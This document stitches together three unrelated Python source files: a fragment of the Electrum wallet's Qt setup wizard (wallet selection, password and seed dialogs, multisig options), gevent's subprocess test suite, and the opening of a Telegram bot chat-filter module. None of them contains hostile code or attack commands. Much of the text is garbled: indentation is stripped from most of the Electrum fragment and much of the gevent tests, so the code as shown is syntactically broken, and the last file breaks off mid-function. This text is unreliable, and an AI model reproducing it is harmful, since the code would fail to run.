path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
                    msg = _("This file does not exist.") + '\n' \
                          + _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
try:
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
finally:
playout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network: 'Network'):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
test__subprocess.py
|
import sys
import os
import errno
import unittest
import time
import gc
import tempfile
import gevent.testing as greentest
import gevent
from gevent.testing import mock
from gevent import subprocess
if not hasattr(subprocess, 'mswindows'):
# PyPy3, native python subprocess
subprocess.mswindows = False
PYPY = hasattr(sys, 'pypy_version_info')
PY3 = sys.version_info[0] >= 3
if subprocess.mswindows:
SETBINARY = 'import msvcrt; msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY);'
else:
SETBINARY = ''
python_universal_newlines = hasattr(sys.stdout, 'newlines')
# The stdlib of Python 3 on Windows doesn't properly handle universal newlines
# (it produces broken results compared to Python 2)
# See gevent.subprocess for more details.
python_universal_newlines_broken = PY3 and subprocess.mswindows
class Test(greentest.TestCase):
def setUp(self):
super(Test, self).setUp()
gc.collect()
gc.collect()
def test_exit(self):
popen = subprocess.Popen([sys.executable, '-c', 'import sys; sys.exit(10)'])
self.assertEqual(popen.wait(), 10)
def test_wait(self):
popen = subprocess.Popen([sys.executable, '-c', 'import sys; sys.exit(11)'])
gevent.wait([popen])
self.assertEqual(popen.poll(), 11)
def test_child_exception(self):
try:
subprocess.Popen(['*']).wait()
except OSError as ex:
assert ex.errno == 2, ex
else:
raise AssertionError('Expected OSError: [Errno 2] No such file or directory')
def test_leak(self):
num_before = greentest.get_number_open_files()
p = subprocess.Popen([sys.executable, "-c", "print()"],
stdout=subprocess.PIPE)
p.wait()
p.stdout.close()
del p
if PYPY:
gc.collect()
gc.collect()
num_after = greentest.get_number_open_files()
self.assertEqual(num_before, num_after)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-W", "ignore",
"-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
if sys.executable.endswith('-dbg'):
assert stderr.startswith(b'pineapple')
else:
self.assertEqual(stderr, b"pineapple")
@greentest.skipIf(subprocess.mswindows,
"Windows does weird things here")
@greentest.skipOnLibuvOnCIOnPyPy("Sometimes segfaults")
def test_communicate_universal(self):
# Native string all the things. See https://github.com/gevent/gevent/issues/1039
p = subprocess.Popen(
[
sys.executable,
"-W", "ignore",
"-c",
'import sys,os;'
'sys.stderr.write("pineapple\\r\\n\\xff\\xff\\xf2\\xf9\\r\\n");'
'sys.stdout.write(sys.stdin.read())'
],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
(stdout, stderr) = p.communicate('banana\r\n\xff\xff\xf2\xf9\r\n')
self.assertIsInstance(stdout, str)
self.assertIsInstance(stderr, str)
self.assertEqual(stdout,
'banana\n\xff\xff\xf2\xf9\n')
self.assertEqual(stderr,
'pineapple\n\xff\xff\xf2\xf9\n')
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_universal1(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE,
universal_newlines=1,
bufsize=1)
try:
stdout = p.stdout.read()
if python_universal_newlines:
# Interpreter with universal newline support
if not python_universal_newlines_broken:
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Note the extra newline after line 3
self.assertEqual(stdout,
'line1\nline2\nline3\n\nline4\n\nline5\nline6')
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
finally:
p.stdout.close()
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_universal2(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE,
universal_newlines=1,
bufsize=1)
try:
stdout = p.stdout.read()
if python_universal_newlines:
# Interpreter with universal newline support
if not python_universal_newlines_broken:
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Note the extra newline after line 3
self.assertEqual(stdout,
'line1\nline2\nline3\n\nline4\n\nline5\nline6')
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
finally:
p.stdout.close()
if sys.platform != 'win32':
def test_nonblock_removed(self):
# see issue #134
r, w = os.pipe()
stdin = subprocess.FileObject(r)
p = subprocess.Popen(['grep', 'text'], stdin=stdin)
try:
                # Closing one half of the pipe causes Python 3 on OS X to terminate the
                # child process; it exits with code 1 and the assertion that p.poll()
                # returns None fails. Removing the close lets it pass under both
                # Python 3 and 2.7. If subprocess.Popen._remove_nonblock_flag is
                # changed to a no-op, the test fails (as expected) even with the
                # close removed.
#os.close(w)
time.sleep(0.1)
self.assertEqual(p.poll(), None)
finally:
if p.poll() is None:
p.kill()
stdin.close()
os.close(w)
def test_issue148(self):
for _ in range(7):
try:
subprocess.Popen('this_name_must_not_exist')
except OSError as ex:
if ex.errno != errno.ENOENT:
raise
else:
raise AssertionError('must fail with ENOENT')
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_check_output_keyword_error(self):
try:
subprocess.check_output([sys.executable, '-c', 'import sys; sys.exit(44)'])
except subprocess.CalledProcessError as e: # pylint:disable=no-member
self.assertEqual(e.returncode, 44)
else:
raise AssertionError('must fail with CalledProcessError')
def test_popen_bufsize(self):
# Test that subprocess has unbuffered output by default
# (as the vanilla subprocess module)
if PY3:
# The default changed under python 3.
return
p = subprocess.Popen([sys.executable, '-u', '-c',
'import sys; sys.stdout.write(sys.stdin.readline())'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(b'foobar\n')
r = p.stdout.readline()
self.assertEqual(r, b'foobar\n')
@greentest.ignores_leakcheck
@greentest.skipOnWindows("Not sure why?")
def test_subprocess_in_native_thread(self):
# gevent.subprocess doesn't work from a background
# native thread. See #688
from gevent import monkey
# must be a native thread; defend against monkey-patching
ex = []
Thread = monkey.get_original('threading', 'Thread')
def fn():
with self.assertRaises(TypeError) as exc:
gevent.subprocess.Popen('echo 123', shell=True)
raise AssertionError("Should not be able to construct Popen")
ex.append(exc.exception)
thread = Thread(target=fn)
thread.start()
thread.join()
self.assertEqual(len(ex), 1)
self.assertTrue(isinstance(ex[0], TypeError), ex)
self.assertEqual(ex[0].args[0], 'child watchers are only available on the default loop')
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def __test_no_output(self, kwargs, kind):
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdout=subprocess.PIPE,
**kwargs)
stdout, stderr = proc.communicate()
self.assertIsInstance(stdout, kind)
self.assertIsNone(stderr)
@greentest.skipOnLibuvOnCIOnPyPy("Sometimes segfaults; "
"https://travis-ci.org/gevent/gevent/jobs/327357682")
def test_universal_newlines_text_mode_no_output_is_always_str(self):
# If the file is in universal_newlines mode, we should always get a str when
# there is no output.
# https://github.com/gevent/gevent/pull/939
self.__test_no_output({'universal_newlines': True}, str)
@greentest.skipIf(sys.version_info[:2] < (3, 6), "Need encoding argument")
def test_encoded_text_mode_no_output_is_str(self):
# If the file is in universal_newlines mode, we should always get a str when
# there is no output.
# https://github.com/gevent/gevent/pull/939
self.__test_no_output({'encoding': 'utf-8'}, str)
def test_default_mode_no_output_is_always_str(self):
# If the file is in default mode, we should always get a str when
# there is no output.
# https://github.com/gevent/gevent/pull/939
self.__test_no_output({}, bytes)
@greentest.skipOnWindows("Testing POSIX fd closing")
class TestFDs(unittest.TestCase):
@mock.patch('os.closerange')
@mock.patch('gevent.subprocess._set_inheritable')
@mock.patch('os.close')
def test_close_fds_brute_force(self, close, set_inheritable, closerange):
keep = (
4, 5,
# Leave a hole
# 6,
7,
)
subprocess.Popen._close_fds_brute_force(keep, None)
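        # Expect bulk closes below and above the kept range, plus an
        # individual close of the hole (fd 6) inside it.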
closerange.assert_has_calls([
mock.call(3, 4),
mock.call(8, subprocess.MAXFD),
])
set_inheritable.assert_has_calls([
mock.call(4, True),
mock.call(5, True),
])
close.assert_called_once_with(6)
@mock.patch('gevent.subprocess.Popen._close_fds_brute_force')
@mock.patch('os.listdir')
def test_close_fds_from_path_bad_values(self, listdir, brute_force):
listdir.return_value = 'Not an Integer'
subprocess.Popen._close_fds_from_path('path', [], 42)
brute_force.assert_called_once_with([], 42)
@mock.patch('os.listdir')
@mock.patch('os.closerange')
@mock.patch('gevent.subprocess._set_inheritable')
@mock.patch('os.close')
def test_close_fds_from_path(self, close, set_inheritable, closerange, listdir):
keep = (
4, 5,
# Leave a hole
# 6,
7,
)
listdir.return_value = ['1', '6', '37']
subprocess.Popen._close_fds_from_path('path', keep, 5)
self.assertEqual([], closerange.mock_calls)
set_inheritable.assert_has_calls([
mock.call(4, True),
mock.call(7, True),
])
close.assert_has_calls([
mock.call(6),
mock.call(37),
])
@mock.patch('gevent.subprocess.Popen._close_fds_brute_force')
@mock.patch('os.path.isdir')
def test_close_fds_no_dir(self, isdir, brute_force):
isdir.return_value = False
subprocess.Popen._close_fds([], 42)
brute_force.assert_called_once_with([], 42)
isdir.assert_has_calls([
mock.call('/proc/self/fd'),
mock.call('/dev/fd'),
])
@mock.patch('gevent.subprocess.Popen._close_fds_from_path')
@mock.patch('gevent.subprocess.Popen._close_fds_brute_force')
@mock.patch('os.path.isdir')
def test_close_fds_with_dir(self, isdir, brute_force, from_path):
isdir.return_value = True
subprocess.Popen._close_fds([7], 42)
self.assertEqual([], brute_force.mock_calls)
from_path.assert_called_once_with('/proc/self/fd', [7], 42)
class RunFuncTestCase(greentest.TestCase):
# Based on code from python 3.6
__timeout__ = greentest.LARGE_TIMEOUT
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError): # pylint:disable=no-member
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c: # pylint:disable=no-member
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
with tempfile.TemporaryFile() as tf:
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
with tempfile.TemporaryFile() as tf:
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
@greentest.skipOnLibuvOnPyPyOnWin("hangs")
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
self.run_python(
(
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"
),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
if __name__ == '__main__':
greentest.main()
|
filter.py
|
import modules.core.database as database
import modules.core.extract as extract
import modules.core.unparse as unparse
import threading
class filter_switch():
    def __init__(self, update, context) -> None:
        self.update = update
        self.context = context
        self.tag_msg = None
        self.tag_user = None
        self.msg = update.message
        self.user = user = self.msg['from_user']
        self.chat = chat = self.msg['chat']
        self.db = database.bot_db()
        try:
            # The command may have been sent as a reply; if so, record the
            # tagged (replied-to) message and its author.
            self.tag_msg = tag_msg = update.message.reply_to_message
            self.tag_user = tag_user = tag_msg['from_user']
            self.db.add_user(user=tag_user)
        except Exception:
            # Not a reply (or the reply has no sender); nothing to record.
            pass
        self.db.parse(chat=chat, user=user)
        self.chat_id = self.chat["id"]
        self.msg_string = self.msg.text
    def lock(self):
        # Only sudo/admin users may lock the chat.
        m = extract.sudo_check_2(msg=self.msg, del_lvl=1, context=self.context)
        if m == 0:
            return
        extract.admin_sync(self.update, self.context, db=self.db)
        self.db.add_settings(self.chat_id, lock=1)
        self.msg.reply_text("Chat locked!")
    def unlock(self):
        m = extract.sudo_check_2(msg=self.msg, del_lvl=1, context=self.context)
        if m == 0:
            return
        unparse.unparse_cls(self.update, self.context).sync()
        self.db.add_settings(self.chat_id, lock=0)
        self.msg.reply_text("Chat unlocked!")
    def filter_remove(self, word, tell=0):
        m = extract.sudo_check_2(msg=self.msg, del_lvl=1, context=self.context)
        if m == 0:
            return
        self.db.remove_filter(self.chat_id, word)
        if tell == 1:
            if word == '*':
                self.msg.reply_text("Cleared all filters!")
            else:
                self.msg.reply_text(word + " removed from the filter list!")
    def filter_add(self, res):
        word = None
        response = None
        delete = 0
        ftype = 0  # 0 = delete only, 1 = reply, 2 = warn
